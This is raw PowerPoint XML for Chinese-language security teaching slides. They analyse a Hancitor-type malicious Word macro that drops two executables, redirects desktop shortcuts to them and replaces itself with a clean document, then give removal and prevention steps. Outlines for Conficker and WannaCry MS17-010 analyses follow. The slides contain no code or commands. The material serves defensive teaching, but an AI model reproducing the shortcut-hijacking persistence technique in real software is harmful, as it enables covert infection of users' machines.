            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lkn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>子目录；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>二是调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>kk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>用户桌面下的快捷方式文件移至当前用户桌面下；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>三是拷贝当前用户桌面下的所有快捷方式文件至“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lnk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下，并调用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>MakeShortcut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数进行感染生成新的桌面快捷方式文件；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>四是利用干净文档替换恶意文档并退出。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finds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8F420F-CC5E-4B05-863F-0CB8B18465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25" y="79689"/>
            <a:ext cx="6796769" cy="6698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236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21140" y="1927705"/>
            <a:ext cx="40455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在打开原始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文档，启用内容，执行宏并退出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>之后。查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录，如下图所示，在该目录下多了两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）和一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lkn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lkn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下包含当前桌面的快捷方式，。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finds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2DE579-DD1E-42D5-A2F4-00EB48A47E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36" y="1483714"/>
            <a:ext cx="7577364" cy="4327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465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2498531" y="2184755"/>
            <a:ext cx="6854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Kk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数比较简单，主要实现了快捷方式的替换。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kk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5927C-71A9-47F6-B0B9-14C3CB95D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31" y="3083203"/>
            <a:ext cx="8081390" cy="1721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719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12913" y="2152627"/>
            <a:ext cx="3857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MakeShortcut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>函数具体内容如下图所示。主要是把当前用户桌面下的快捷方式文件进行感染操作，使得所有的快捷方式文件都指向到“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%/wird.exe”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，并由其负责解析执行。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MakeShortcut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FC6398-84ED-402D-9A2C-F72858EE43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39" y="-34925"/>
            <a:ext cx="5276850" cy="692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40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12913" y="2152627"/>
            <a:ext cx="38578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比如原来桌面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>010 Editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>快捷方式文件，前后的对比图如下图所示。可以看到，快捷方式的属性中，目标类型、目标和起始位置三项都发生了变化。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MakeShortcut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3C89257-CE9D-45FF-B95D-710715826204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4765197" y="988559"/>
            <a:ext cx="6512041" cy="4880882"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4959734" cy="38658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C3D1A3-CB69-4AB7-8686-294F411A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33930" cy="386588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378E2FA-67CC-4934-980A-12B8EE48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44" y="0"/>
              <a:ext cx="2561590" cy="3862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09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12913" y="2152627"/>
            <a:ext cx="3857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此时，点击桌面上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>010 Editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>快捷方式，出现如下提示框。可以看出快捷方式呗重定向到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序处。至于文件不能被正常执行，应该是因为程序所处的环境原因导致的。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MakeShortcut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909EE4F-C68C-4DF4-B2F3-D8A3187E12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99" y="2509948"/>
            <a:ext cx="5828332" cy="166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220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四、恶意宏分析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12913" y="2152627"/>
            <a:ext cx="106039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dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过静态分析大概得知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的作用是启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序，然后执行自删除操作，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>UAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提权。在能真实运行上述程序的环境中，点击上述快捷方式的时候，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会出现弹窗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>提示需要管理员运行，程序窗口显示的名称为原始快捷方式打开的程序名。但是实际执行的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>弹窗执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>执行完成后将恢复原始快捷方式的指向，并打开原始快捷方式指向的程序窗体。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>总的来说，恶意文档感染及之后工作的大致流程是：通过执行恶意宏释放出两个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>并修改桌面快捷方式，然后用干净文档替换掉恶意文档。感染后第一次点击桌面快捷方式时，程序执行恶意程序，并快速地将快捷方式复原，交还给原始程序。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5A271B-C662-485A-BFBE-CCA8DBBFEF01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MakeShortcut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728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五、恶意样本的处理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424881" y="1460130"/>
            <a:ext cx="106039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恶意样本可以通过如下方式进行处理：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>．手动处理，首先删除下载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>附件，然后再删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>%APPDATA%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录下的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>lkn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>目录、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>程序。所有删除操作都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Shift+delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>进行永久性删除。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>利用查毒软件自动处理，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>win10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows Defender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会自动删除恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>样本，但是不会删除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>wird.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文件；开启电脑管家或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>360</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>后，在执行上述带有恶意宏的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>文档时，杀毒软件会提示可疑进程正在启动，阻止进程启动即可，再次点击该文档时，系统会弹出对话框提示无法进行再次访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>至于因</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>werd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>运行导致的感染则需要进一步的分析实现清除，从网上曝光的资料来看，该程序应该属于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Hancitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>系列恶意软件，用于下载其它恶意软件。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85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六、恶意样本预防与加固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21139" y="870607"/>
            <a:ext cx="1060390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与常见的宏病毒样本相比，本次恶意宏文档具备如下的几个特点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、没有网络下载动作。文档内直接包含恶意负载部分，没有利用类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>脚本下载恶意文件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、没有直接进程执行动作。不像以往恶意宏会直接执行恶意负载，作者利用感染用户桌面快捷方式的途径来达成进程启动目的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、会利用干净文档替换恶意文档，从而更具迷惑性。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可以通过如下方式进行预防与加固：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、不要随意打开来路不明的文档，遇到提示需要类似这种启用内容执行宏操作时，不要随意点击。至少需要利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>oletools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>OfficeMalScanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>这样的攻击判断宏不是恶意的之后再启用。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、养成安装并启用杀毒软件的习惯。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、安装较高版本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>软件；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>版本至少要大于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office 2007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，这样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>会自动禁用宏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>、定期更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，并关注</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>补丁发布情况，定期给</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>打上补丁。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US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08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050"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311691" y="1124744"/>
            <a:ext cx="0" cy="4165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TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3791745" y="1858924"/>
            <a:ext cx="7200800" cy="204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工业环境中飞客蠕虫病毒事故分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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Office</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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恶意文件分析与防范</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="26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marL="380990" indent="-380990">
              <a:lnSpc>
                <a:spcPts val="5333"/>
              </a:lnSpc>
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>WannaCry</a:t>
            </a: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</a:rPr>
              <a:t>中关于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2667" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MS17-010</a:t>
            </a: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</a:rPr>
              <a:t>漏洞利用分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="791411" y="1858923"/>
            <a:ext cx="2208245" cy="240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333" spc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教学大纲</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="5333" spc="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57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二、事故环境分析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由于环境为工业控制环境，使得不能够直接在操作台的环境中直接进行操作，因此对环境进行镜像，使其能够在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>环境中进行进一步分析。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通过在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中还原镜像，并安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对其进行流量分析，以获取扫描的流量特征。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67CA3-816C-409B-9110-79F09DFD6E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70" y="1236685"/>
            <a:ext cx="8453159" cy="43846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132304-F623-4B7E-9437-A685098DC7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2077615" y="5884907"/>
            <a:ext cx="8725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这个特征多为蠕虫攻击的前奏攻击。并且网络带宽被大量的占用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939778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WannaCry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713024" y="1147607"/>
            <a:ext cx="106039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病毒名称：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Trojan-Ransom.Win32.Wanna.m</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>所属家族：木马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>勒索</a:t>
            </a:r>
            <a:r>
